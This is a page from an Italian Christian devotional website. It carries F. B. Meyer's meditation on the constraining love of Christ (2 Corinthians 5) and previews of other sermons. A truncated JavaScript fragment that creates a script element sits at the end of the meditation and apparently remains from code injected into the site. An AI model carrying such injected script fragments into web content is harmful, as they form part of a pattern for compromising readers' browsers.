Meditazione del giorno: Costrizione d’amore

di F. B. MEYER  –  “L’amore di Cristo ci costringe …. facciamo da ambasciatori per Cristo, come se Dio esortasse per mezzo nostro.” – (2 Corinzi  5,14-20.)  –   Un ambasciatore può vivere in un paese straniero, ma non fa parte di quel paese. Lui lì è il rappresentare del suo paese, e non gli è consentito di portare avanti nessun interesse di tipo personale. Noi dobbiamo rappresentare Cristo al mondo. La parola “costringe” suggerisce una pressione costante, una spinta, come quando l’acqua è forzata lungo un determinato condotto. Paolo dice: “Io agisco così perché sono sotto il fascino di una potente imposizione, non posso fare altro, non sono padrone di me stesso Non mi meraviglio che ciò possa apparire  insolito e stravagante.  Attribuisco la mia eccentricità a Cristo – il suo amore mi trascina, e mi porta avanti.”

Cosa intende con “l’amore di Cristo?” E’ il suo per noi , o il nostro per Lui? È impossibile fare questa distinzione, perché sono uno. Come la luce del sole colpisce la luna, e si riflette sulla terra, così l’amore che abbiamo per Cristo, o per l’uomo, è il riflesso del Suo amore per noi. Tutto l’amore nei nostri cuori freddi e senza amore è l’emanazione e il riflesso dell’Amore che è partito da Lui, è stato mediato a noi al Calvario, e si riflette da noi, come la luce del sole in uno specchio.

L’amore di Cristo non costringe tutti i  cristiani, perché non tutti comprendono il profondo significato della Croce, ma quando l’anima arriva ad apprezzare questo, e passa per la porta della morte nella vita di Dio, allora comincia a sentire la costrizione dell’amore di Cristo.

Il perno della nostra vita deve essere il Cristo risorto: “Noi non viviamo più per noi stessi, ma per Colui che è risorto”. A volte sentiamo persone descritte come eccentriche – fuori dal centro. Un uomo è eccentrico per il mondo quando è concentrico con Cristo. E’ così che si diventa una nuova creazione. Quando per fede noi siamo uniti a Gesù Cristo nella Sua Croce e nella sua morte, la transizione è compiuta. Passiamo oltre, nella vita di Pasqua. Egli ci ha riconciliato a Sé, e ha dato a noi il ministero della riconciliazione – quindi siamo ambasciatori. Dobbiamo proclamare il perdono per il peccatore, la rottura delle catene dei prigionieri, e l’approssimarsi della salvezza a tutti (Isaia 52:7-10).var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Priorità del risveglio.

di R. J. WELLS  –  Senza dubbio il bisogno più grande ed urgente della nostra nazione e della chiesa, oggi, è quello di avere un possente risveglio spirituale. Malgrado tutti gli sforzi titanici che la Chiesa sta compiendo nel tentativo di risolvere i molti problemi che l’assillano, i suoi progressi sono alquanto limitati. Infatti, quando noi analizziamo la situazione generale, siamo portati a concludere che i migliori sforzi …
Leggi Tutto

Roberto Bracco: "Il Vivente". Sermone audio

ROBERTO BRACCO: “IL VIVENTE” – Sermone Evangelistico tratto da Apocalisse 1:18 – ” «Non temere! Io sono il primo e l’ultimo, il vivente; io fui morto, ma ecco sono vivente per i secoli dei secoli, amen!” …
Leggi Tutto

MATRIMONIO PROFETICO (Ruth cap. 4)

– Abbiamo visto nella meditazione  precedente come Naomi consigliò Ruth per ottenere il suo diritto ad esser riscattata, come prescriveva la legge di Mosè. Abbiamo visto come Ruth si presentò nell’aia di Boaz, e abbiamo applicato questa figura alla chiesa che deve prepararsi ad incontrare il Suo Sposo, il Suo Redentore, Cristo il Signore. – Oggi vedremo come i piani di Dio si compiono meravigliosamente e finalmente questa …
Leggi Tutto

IL RISVEGLIO COMINCIA NELLA FAMIGLIA

di ROY HESSION  –     Il luogo più difficile, il più impegnativo, ma anche il più necessario, se si vuole un risveglio, è costituito dalla famiglia. Migliaia di anni fa, nel più meraviglioso giardino che il mondo abbia mai avuto, vivevano un uomo e una donna. Creati a somiglianza del loro Creatore, essi vivevano per manifestare la bellezza della creazione e per glorificare Dio in ogni momento della giornata …
Leggi Tutto

17 Aprile 2011 - ZAC POONEN

Ospite il pastore ZAC POONEN della Christian Fellowship Church, Bangalore, India. Potete ascoltare la sua predicazione (Paul Schafer interprete) …
Leggi Tutto

Dio vuole salvare il peccatore

di JACK HAYFORD  –  L’onestà verso Dio è una premessa indispen­sabile per una preghiera efficace. Se non ri­spettiamo questa premessa corriamo il rischio di finire nella trappola che Satana, il nostro nemico mortale, è sempre pronto a tenderci. Finiremo quindi per cadere in un circolo vi­zioso che renderà la nostra vita spirituale as­solutamente inefficiente. Se ci troviamo in questa situazione, ci chiederemo inevitabil­mente: »Come posso permettermi di pregare, …
Leggi Tutto

Argomenti Biblici

LA FEDE

LA FEDE

da un sermone di Smith Wigglesworth  -  «Per fede Abele offerse a Dio un sacrificio più eccellente che Caino… per fede Enoch fu trasportato per non veder la morte... per ...
Leggi Tutto
Calvario

Calvario

di John Charles Ryle  -  Probabilmente saprete che il Calvario era un posto poco fuori Gerusalemme, dove il Signore Gesù Cristo, il Figlio di Dio, fu crocifisso. Sul Calvario non ...
Leggi Tutto
La tua parola mi ristora

La tua parola mi ristora

di N.A. WOYCHUK  -  Il Dr. R. A. Torrey disse: “Vi è più potenza in questo libro, per la salvezza degli uomi­ni, per la loro purificazione, per rallegrare e rendere ...
Leggi Tutto
LA PACE E’ POSSIBILE!

LA PACE E’ POSSIBILE!

di J. F. Walvoord   -  Desideriamo la pace nel mondo.  Ai nostri giorni sono pochi i quesiti che ci inducono a meditare, certamente non tanto quanto la domanda: E’ ...
Leggi Tutto
CORPO E SANGUE: IL SIGNIFICATO DELLA CENA DEL SIGNORE

CORPO E SANGUE: IL SIGNIFICATO DELLA CENA DEL SIGNORE

«Il calice della benedizione che benediciamo, non è la comunione col sangue di Cristo? Il pane che noi rompiamo, non è la comunione col corpo di Cristo? Siccome vi è ...
Leggi Tutto
L'UNICA VIA

L’UNICA VIA

di OSWALD J. SMITH - Un banchiere ed un industriale sedevano l'uno di fronte all'altro negli uffici della banca. L'industriale parlava molto animatamente, quando all'improvviso l'altro interruppe. "Ridicolo! Assurdo! Pazzesco!" esclamò l'orgoglioso ...
Leggi Tutto

Dai nostri Culti